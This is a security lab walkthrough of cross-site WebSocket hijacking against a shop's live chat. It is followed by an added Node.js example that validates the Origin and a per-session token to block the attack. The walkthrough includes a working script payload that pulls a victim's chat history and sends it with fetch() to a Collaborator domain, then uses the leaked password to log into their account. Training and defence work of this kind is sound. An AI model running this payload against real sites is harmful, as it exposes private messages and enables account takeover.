This online shop has a live chat feature implemented using WebSockets.
To solve the lab, use the exploit server to host an HTML/JavaScript payload that uses a cross-site WebSocket hijacking attack to steal the victim's chat history, then gain access to their account.
Note: The obvious way to exfiltrate the victim's history is using Burp Collaborator. Note that you must use the public Burp Collaborator server (burpcollaborator.net).
In Burp Proxy, in the WebSockets history tab, observe that the "READY" command retrieves past chat messages from the server.
In Burp Proxy, in the HTTP history tab, find the WebSocket handshake request. Observe that the request has no CSRF tokens.
Right-click on the handshake request and select "Copy URL".
Visit the exploit server, and create a page with the following content, replacing your-websocket-URL with the URL from the WebSocket handshake, and your-collaborator-domain with a payload generated by Burp Collaborator client. Note: Ensure you change the protocol in the WebSocket handshake URL from https:// to wss://.
<script>
    // Open a WebSocket to the shop; the victim's browser attaches their session cookie to the handshake.
    var websocket = new WebSocket('wss://your-websocket-URL');
    websocket.onopen = start;
    websocket.onmessage = handleReply;

    // Once the connection is open, request the stored chat history with the "READY" command.
    function start(event) {
        websocket.send("READY");
    }

    // Forward every message the server sends to the Collaborator domain.
    function handleReply(event) {
        fetch('https://your-collaborator-domain/?' + event.data, {mode: 'no-cors'});
    }
</script>
View the exploit page.
Poll for interactions using Burp Collaborator client. Verify that the attack has successfully retrieved your chat history and exfiltrated it via Burp Collaborator.
You should also see that another user has visited your exploit page, and that their chat history contains their password.
Log into the victim user's account.
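The lab works because the handshake is authenticated by nothing but the session cookie, which the browser attaches regardless of which site opened the connection. The following server-side check is an added example and is not part of the lab or of PortSwigger's solution; it shows the two controls that would have rejected the payload above: an Origin allow-list (the browser sets Origin itself on every WebSocket handshake, and a page on another site cannot change it) and an unguessable per-session token that the real chat page places in the handshake URL, which a cross-site page cannot read. It goes slightly beyond the lab by combining both checks rather than relying on either alone. The origin names, cookie and query-parameter names, session store and both sample handshakes are constructed assumptions for this example.

```javascript
// Added example: validating a WebSocket handshake server-side to stop
// cross-site WebSocket hijacking. Not the lab's own code.

// Assumed origin of the shop's chat page.
const ALLOWED_ORIGINS = new Set(['https://shop.example']);

// Constructed session store: session cookie value -> per-session handshake token.
// In a real service the token is generated per login and rendered into the chat page.
const SESSIONS = new Map([
  ['sess-carlos-0001', 'ws-token-4f9a1c2e'],
]);

// Parse a Cookie request header into a name -> value object.
function parseCookies(header) {
  const out = {};
  for (const part of header.split(';')) {
    const idx = part.indexOf('=');
    if (idx === -1) continue;
    const name = part.slice(0, idx).trim();
    if (name) out[name] = part.slice(idx + 1).trim();
  }
  return out;
}

// Constant-time string comparison so the token check does not leak a prefix match.
function safeEqual(a, b) {
  const x = String(a);
  const y = String(b);
  if (x.length !== y.length) return false;
  let diff = 0;
  for (let i = 0; i < x.length; i++) diff |= x.charCodeAt(i) ^ y.charCodeAt(i);
  return diff === 0;
}

// Decide whether a handshake may be upgraded. `req` mirrors Node's
// http.IncomingMessage shape ({ url, headers }) with lower-cased header names.
function validateHandshake(req, allowedOrigins = ALLOWED_ORIGINS, sessions = SESSIONS) {
  const h = req.headers;
  if (String(h['upgrade'] || '').toLowerCase() !== 'websocket') {
    return { ok: false, reason: 'not a WebSocket upgrade' };
  }
  // Check 1: Origin allow-list. Browsers always send Origin on a WebSocket
  // handshake; a missing or foreign origin is rejected outright.
  const origin = h['origin'];
  if (!origin || !allowedOrigins.has(origin)) {
    return { ok: false, reason: 'origin not allowed: ' + (origin || '<none>') };
  }
  // Check 2: per-session token in the URL. The cookie alone must never be
  // sufficient, because the victim's browser attaches it to any site's request.
  const cookies = parseCookies(h['cookie'] || '');
  const expected = cookies.session ? sessions.get(cookies.session) : undefined;
  if (!expected) {
    return { ok: false, reason: 'no valid session cookie' };
  }
  const supplied = new URL(req.url, 'https://placeholder.invalid').searchParams.get('ws_token') || '';
  if (!safeEqual(supplied, expected)) {
    return { ok: false, reason: 'missing or wrong handshake token' };
  }
  return { ok: true, session: cookies.session };
}

// Constructed handshake as sent by the shop's own chat page.
const LEGIT_HANDSHAKE = {
  url: '/chat?ws_token=ws-token-4f9a1c2e',
  headers: {
    host: 'shop.example',
    upgrade: 'websocket',
    connection: 'Upgrade',
    origin: 'https://shop.example',
    cookie: 'session=sess-carlos-0001',
  },
};

// Constructed handshake as produced when the victim's browser loads a page on
// another site: the session cookie rides along, but the Origin is the other
// site's and the token is absent.
const HIJACK_HANDSHAKE = {
  url: '/chat',
  headers: {
    host: 'shop.example',
    upgrade: 'websocket',
    connection: 'Upgrade',
    origin: 'https://exploit-server.example',
    cookie: 'session=sess-carlos-0001',
  },
};

console.log('legitimate:', validateHandshake(LEGIT_HANDSHAKE));
console.log('cross-site:', validateHandshake(HIJACK_HANDSHAKE));
```

With the `ws` package this logic belongs in the `verifyClient` option or in the HTTP server's `upgrade` event, before the socket is accepted. Rejected handshakes with a valid session cookie but a foreign Origin are worth logging, since in normal operation they should not occur and are a direct signal of a hijacking attempt against that user. Note that non-browser clients may omit Origin; if such clients are supported, they still need the token and should not be exempted from the check.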